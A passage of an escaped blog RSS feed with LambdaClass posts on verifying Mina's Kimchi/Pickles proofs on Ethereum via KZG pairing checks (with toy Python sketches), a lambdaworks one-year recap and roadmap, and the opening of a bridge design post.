&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; public selector polynomials that can used as handy coefficients in gates&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    #[serde_as(as = &amp;quot;Vec&amp;lt;o1_utils::serialization::SerdeAs&amp;gt;&amp;quot;)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub coeffs: Vec&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Kimchi contains three main algorithms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Setup: takes the circuit and produces the prover and verifier indexes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Proof creation: takes the circuit and the prover index and outputs a proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Proof verification: takes the proof and the verifier index and checks the proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The steps performed by the prover to obtain the proof are listed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;o1-labs.github.io&#x2F;proof-systems&#x2F;specs&#x2F;kimchi.html#proof-creation&quot;&gt;here&lt;&#x2F;a&gt;. The verification follows the steps shown &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;o1-labs.github.io&#x2F;proof-systems&#x2F;specs&#x2F;kimchi.html#proof-verification&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;pickles&quot;&gt;Pickles&lt;&#x2F;h2&gt;
&lt;p&gt;Pickles uses the Pasta curves to deliver incrementally verifiable computation efficiently. The Pasta curves are also known as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Tick&#x2F;Step (Vesta), handling blocks and transactions&amp;#39; proofs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Tock&#x2F;Wrap (Pallas), handling signatures and performing recursive verifications.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Tock is used to prove the verification of a Tick proof and outputs a Tick proof. Tick is used to prove the verification of a Tock proof and outputs a Tock proof.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathrm{Prove_{tock} ( Verify(Tick) ) = Tick_{proof}}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $\mathrm{Prove_{tick} (Verify(Tock) ) = Tock_{proof}}$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Both Tick and Tock can verify at most two proofs of the opposite kind. Pickles contains two components: fast (1 - 30 ms) and slow (100 ms - 1 s) verifiers. Given a proof $\pi_1$, we first execute the fast verifier, and the update algorithm takes the previous proof state, $S_0$, and $\pi_1$ and generates the next proof state, $S_1$. If another proof $\pi_2$ arrives, instead of executing the slow verifier we begin a new accumulation phase: we run the fast verifier on $\pi_2$ and update the proof state from $S_1$ to $S_2$. If there are no more incoming proofs, we use the slow verifier to check the last state proof $S_n$.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;kzg-verifier-solidity&quot;&gt;KZG verifier solidity&lt;&#x2F;h2&gt;
&lt;p&gt;The code for the verifier in solidity is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;mina_bridge&#x2F;blob&#x2F;main&#x2F;eth_verifier&#x2F;src&#x2F;Verifier.sol&quot;&gt;here&lt;&#x2F;a&gt;. The verifier can be divided into two large parts:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Partial verification.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Final verification.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first handles checks such as the correct length of evaluations and commitments, regenerates the random challenges using Fiat-Shamir, and uses the claimed evaluations to see whether the gate and permutation constraints are valid. The second part checks the commitments by calling the pairing check function. In a naïve KZG verification, we must compute one pairing for every evaluation we want to check. However, we can randomly combine the commitments and evaluations to perform just one pairing check.&lt;&#x2F;p&gt;
&lt;p&gt;The working principle behind the verification of the KZG evaluation proof is the following: we have a commitment to a polynomial, $p(x)$, an evaluation point, $\zeta$, a claimed evaluation, $v = p(\zeta)$, and the evaluation proof, $\pi = \mathrm{cm}(q)$, which is the commitment to a quotient polynomial, $q(x)$. If the evaluation is correct, then $p(x) - v$ should be divisible by $x - \zeta$, that is&lt;br &#x2F;&gt;
$p(x) - v = (x - \zeta) q(x)$&lt;br &#x2F;&gt;
We cannot do this check directly since we have access only to the commitments and not the whole polynomials. We have $\mathrm{cm}(p) = p(s) g_1$ and $\mathrm{cm}(q) = q(s) g_1$, which are points on an elliptic curve. We can instead check the identity at the single point $s$: if the two sides match there, then with overwhelming probability the polynomial was evaluated correctly. The pairing is a function $e(x,y)$ with two properties:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Bilinear: $e(x_1+x_2,y_1+y_2) = e(x_1 , y_1 )e(x_2 , y_2 )e(x_1 , y_2 )e(x_2 ,y_1 )$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Non-degenerate: if $e(x,y) = 1$, then $x$ or $y$ are the point at infinity (neutral element for elliptic curve addition).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It follows from the bilinearity property that&lt;br &#x2F;&gt;
$e( p(s) g_1 - v g_1 , g_2 ) = e(g_1 , g_2 )^{p(s) - v}$&lt;br &#x2F;&gt;
Similarly,&lt;br &#x2F;&gt;
$e( q(s) g_1 , s g_2 - \zeta g_2 ) = e(g_1 , g_2 )^{q(s)(s - \zeta)}$&lt;br &#x2F;&gt;
Since neither $g_1$ nor $g_2$ are the point at infinity (because they are generators of the whole group), $e (g_1 , g_2) \neq 1$, and therefore, if both pairings are equal, then it follows that&lt;br &#x2F;&gt;
$p(s) - v = q(s) (s - \zeta)$&lt;br &#x2F;&gt;
The EVM has a precompile, the pairing check, which computes the product of both pairings and verifies that it is equal to one. To fit this condition, we rewrite the second pairing, negating the commitment to the quotient,&lt;br &#x2F;&gt;
$e( - q(s) g_1 , s g_2 - \zeta g_2 ) = e(g_1 , g_2 )^{ - q(s)(s - \zeta)}$&lt;&#x2F;p&gt;
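&lt;p&gt;As a sanity check on this identity, here is a toy sketch (our own illustration, not the verifier code): we model each pairing by the product of its two scalars &quot;in the exponent&quot; modulo a small prime, so the pairing check succeeds exactly when $p(s) - v = q(s)(s - \zeta)$.&lt;&#x2F;p&gt;

```python
# Toy model of the KZG pairing check over a small prime (illustrative only:
# real pairings act on elliptic-curve points, not bare integers).
P = 10007  # toy group order, NOT a real curve order

def evaluate(coeffs, x):
    """Evaluate a polynomial given low-to-high coefficients, modulo P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

def pairing_check(p_at_s, v, q_at_s, s, zeta):
    # In the exponent, e(cm(p) - v*g1, g2) contributes p(s) - v, while
    # e(-cm(q), s*g2 - zeta*g2) contributes -q(s)*(s - zeta); their product
    # is the identity exactly when the two quantities agree mod P.
    return (p_at_s - v) % P == (q_at_s * (s - zeta)) % P

# p(x) = x^2 + 3x + 2 evaluated at zeta = 5 gives v = 42, and the quotient is
# q(x) = (p(x) - v) / (x - 5) = x + 8. With a toy secret s = 7:
p_coeffs, q_coeffs = [2, 3, 1], [8, 1]
s, zeta, v = 7, 5, 42
assert pairing_check(evaluate(p_coeffs, s), v, evaluate(q_coeffs, s), s, zeta)
```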
&lt;h3 id=&quot;batching-evaluation-at-point-zeta-for-several-polynomials&quot;&gt;Batching evaluation at point $\zeta$ for several polynomials&lt;&#x2F;h3&gt;
&lt;p&gt;If we have several polynomials $p_1, p_2, … p_n$ and we want to check their evaluations at the same point $\zeta$, we just need to take a random linear combination of each of the following elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commitments to $p_k$: $\mathrm{cm}(p) = \sum \alpha^k \mathrm{cm}(p_k )$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commitments to quotients $q_k$: $\mathrm{cm}(q) = \sum \alpha^k \mathrm{cm}(q_k )$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Evaluations: $v = \sum \alpha^k v_k$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;batching-evaluations-at-several-points-zeta-k-for-one-polynomial&quot;&gt;Batching evaluations at several points $\zeta_k$ for one polynomial&lt;&#x2F;h3&gt;
&lt;p&gt;If we need to check that a polynomial evaluates at $\zeta_1$ to $v_1$, at $\zeta_2$ to $v_2$, … and at $\zeta_n$ to $v_n$, we can fuse all these checks into a single one. The steps are as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Compute the polynomial of degree $n - 1$, $I(x)$, that interpolates the points $(\zeta_k , v_k )$. This means that $I( \zeta_k ) = v_k$ for $k = 1, 2, ... n$. If we have two points only, $I(x) = (v_2 - v_1 ) (\zeta_2 - \zeta_1 )^{- 1} (x - \zeta_1 ) + v_1$, which is the line passing through those two points.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The polynomial $p(x) - I(x)$ evaluates to $0$ at each $\zeta_k$, which means that $p(x) - I(x)$ is divisible by the polynomial $D(x) = \prod (x - \zeta_k )$ (in our two-point case, this is $(x - \zeta_1 )(x - \zeta_2 )$). Compute the quotient $q(x)$ of $p(x) - I(x)$ by $D(x)$ and commit to it.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can combine this idea with batch verification for several polynomials and just pay for one pairing check!&lt;&#x2F;p&gt;
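&lt;p&gt;The two-point case can be checked end to end with plain modular arithmetic (a toy sketch with parameters of our choosing, not actual commitments): interpolate the line $I(x)$, divide $p(x) - I(x)$ by $D(x) = (x - \zeta_1)(x - \zeta_2)$ via synthetic division, and confirm both remainders vanish before doing a verifier-style spot check at a random point.&lt;&#x2F;p&gt;

```python
# Sketch of the two-point batching argument over a toy prime field.
P = 10007  # toy prime modulus; real KZG uses a pairing-friendly field

def evaluate(coeffs, x):
    """Evaluate a polynomial given low-to-high coefficients, modulo P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

def div_linear(coeffs, z):
    """Synthetic division of a polynomial (low-to-high coeffs) by (x - z)."""
    quotient, carry = [], 0
    for c in reversed(coeffs):
        carry = (c + carry * z) % P
        quotient.append(carry)
    remainder = quotient.pop()  # the last value produced is the remainder
    quotient.reverse()
    return quotient, remainder

# Demo: p(x) = x^3 + 1 with zeta_1 = 2, zeta_2 = 3, so v_1 = 9 and v_2 = 28.
p = [1, 0, 0, 1]
z1, z2, v1, v2 = 2, 3, 9, 28

# Interpolating line I(x) = (v2 - v1)(z2 - z1)^{-1} (x - z1) + v1.
slope = (v2 - v1) * pow(z2 - z1, P - 2, P) % P
line = [(v1 - slope * z1) % P, slope]

# p(x) - I(x) must be divisible by D(x) = (x - z1)(x - z2).
diff = [(a - b) % P for a, b in zip(p, line + [0, 0])]
q1, r1 = div_linear(diff, z1)
q, r2 = div_linear(q1, z2)
assert r1 == 0 and r2 == 0  # both remainders vanish

# Verifier-style spot check at a point r: p(r) - I(r) == D(r) * q(r).
r = 7
lhs = (evaluate(p, r) - evaluate(line, r)) % P
rhs = (r - z1) * (r - z2) * evaluate(q, r) % P
assert lhs == rhs
```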
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;This post presented the bridge between the succinct blockchain Mina and Ethereum, allowing seamless cross-chain transactions and dApps to leverage Mina’s zk capabilities. One of the main challenges is related to the verification of Mina’s proofs in Ethereum since they rely on IPA, which is more expensive than those based on KZG. To deal with this, we have to create a wrapper (a program that proves the verification of Mina proofs) to obtain new proofs that can be verified in Ethereum more cost-effectively. We covered the basics of Kimchi (Mina’s proof system) and Pickles (which allows Mina to deliver incrementally verifiable computation, the key component for succinctness) and how KZG commitments work. We also discussed some of the challenges related to foreign field operations. In upcoming posts, we will discuss some of the bridge’s components and the project’s milestones and advances in more depth.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Happy birthday, lambdaworks!</title>
          <pubDate>Tue, 30 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/happy-birthday-lambdaworks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/happy-birthday-lambdaworks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/happy-birthday-lambdaworks/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;It’s been almost a year since we started building &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;lambdaworks&lt;&#x2F;a&gt;! lambdaworks is our library that implements efficient cryptographic primitives to build proof systems. Along with it, many backends for proof systems are shipped, and compatibility with different frontends is supported. We wanted to give an overview of what we have done over the last year and the roadmap for the future. Why did we choose to embark on this journey? We are truly bullish on zero-knowledge&#x2F;validity proofs and their potential to solve many problems and create new applications, as we stated in our &lt;a href=&quot;&#x2F;transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;lambda-crypto-doctrine&#x2F;&quot;&gt;crypto doctrine&lt;&#x2F;a&gt;. We decided to work in this challenging environment, where math, distributed systems, and cryptography meet. The first challenge we faced was the lack of performant and developer-friendly libraries, though there are some exceptions: some have nice APIs and are easy to use but are not written in Rust; others are written in Rust but follow poor programming practices. So, together with a team of engineers and mathematicians, we decided to build a new library, written in Rust, focusing on performance and developer-friendliness. We also wanted to make all this knowledge available to other developers and help onboard new people to this space by writing clear documentation and explaining how each of the parts and proof systems works. Open source and decentralization are necessary practical conditions for building crypto, and we cannot speak of decentralization while the knowledge and tools to build these systems remain concentrated in a few players.
Let’s jump into our plans for the future and some numbers.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;some-numbers&quot;&gt;Some numbers:&lt;&#x2F;h2&gt;
&lt;p&gt;Here we give some figures to understand all the work we have been doing in the library and the contributions from the community:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 464 PRs merged.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 60 contributors.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 8 releases.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 49k lines of code in Rust&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Several posts on finite fields, cryptography, and proof systems.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Use of lambdaworks in 2 CTF events and Lambda ZK Week.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 800+ members in lambdaworks channel.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * One cryptography bootcamp with 21 interns from 12 countries&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;objectives&quot;&gt;Objectives:&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Reference library for cryptography and proof systems.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Written in Rust.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * To be used in production, not just for academic research. However, we also want to enable researchers to write their papers in our library easily.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Support for GPU acceleration (Metal, CUDA).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Simple to use, developer-focused.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Clear documentation, plenty of examples.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;what-do-we-still-have-to-work-on&quot;&gt;What do we still have to work on&lt;&#x2F;h2&gt;
&lt;p&gt;We have added several tools and proof systems to the library, but we still have a long way to go:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Integration into other provers, VMs, and cryptography projects.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Documentation. We still need to improve the project documentation, add more examples, and enhance user experience.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Create a grant and bounty program&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Support the use of Icicle.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Towers of binary fields.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * New polynomial commitment schemes: basefold, brakedown, inner product argument (IPA), Binius.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * New layouts for Cairo STARK Platinum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Lookup arguments (for example, Plookup, and Lasso)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * New proof systems: Hyperplonk, Spartan, Marlin, GKR.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Folding schemes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Supporting new elliptic curves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * New hash functions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Improve performance of FFT, elliptic curves, polynomials, and general finite field arithmetic.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add new coordinate systems for elliptic curves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Second edition of the cryptography bootcamp.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;what-we-accomplished&quot;&gt;What have we accomplished?&lt;&#x2F;h2&gt;
&lt;p&gt;Over the year, we have implemented different core math, crypto building blocks, and proof systems. We have received contributions from the community, not only in the form of PRs but also as issues and bug reports.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;main-crates&quot;&gt;Main crates:&lt;&#x2F;h3&gt;
&lt;p&gt;The main crates we have implemented are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Finite Fields: all the mathematical building blocks for cryptography and proof systems. This is used by the Cairo VM in production in Starknet.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Crypto: hash functions, Merkle trees, polynomial commitment schemes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Provers (&amp;amp; verifiers): STARK Platinum, Groth 16, Plonk. Adapters for Cairo, Winterfell, Miden (STARKs), Circom, and Arkworks (Groth 16).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;fields&quot;&gt;Fields:&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Optimized Montgomery backend.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Specialized backends for Mersenne-31 and Mini-Goldilocks ($2^{64} - 2^{32} +1$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Field extensions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Radix-2 and radix-4 fast Fourier Transform.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Elliptic curves.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Multiscalar multiplication.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pairings.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Univariate polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Multivariate polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;crypto&quot;&gt;Crypto:&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Fiat Shamir transformation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hash functions: Poseidon, Pedersen&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Merkle trees&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * KZG commitment scheme&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;provers&quot;&gt;Provers:&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * General STARK prover&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Groth 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Plonk with KZG commitment&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Adapters&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>A fast trust minimized intent based bridge solution for Ethereum and L2s powered by multi-proof storage proofs</title>
          <pubDate>Sun, 28 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/a-fast-trust-minimized-intent-based-bridge-solution-for-ethereum-and-l2s-powered-by-multi-proof-storage-proofs/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/a-fast-trust-minimized-intent-based-bridge-solution-for-ethereum-and-l2s-powered-by-multi-proof-storage-proofs/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/a-fast-trust-minimized-intent-based-bridge-solution-for-ethereum-and-l2s-powered-by-multi-proof-storage-proofs/">&lt;p&gt;&lt;strong&gt;Authors:&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;thisisrj&quot;&gt;Roberto Catalan&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;federicocarrone&quot;&gt;Federico Carrone&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Bridges are generally insecure and economically inefficient. They exhibit an asymmetry between users and bridge operators, where users can easily lose funds. We propose a bridge design that is simple, modular, and utilizes multi-storage proofs and the native messaging system between Ethereum and Layer 2 networks (L2s) as a fallback mechanism.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bridging-is-a-trust-issue&quot;&gt;Bridging is a trust issue&lt;&#x2F;h2&gt;
&lt;p&gt;How can we offer a system where the users don’t have to trust a facilitator to exchange their assets from an L2 to Ethereum?&lt;&#x2F;p&gt;
&lt;p&gt;We propose a simple protocol that follows these steps:&lt;&#x2F;p&gt;
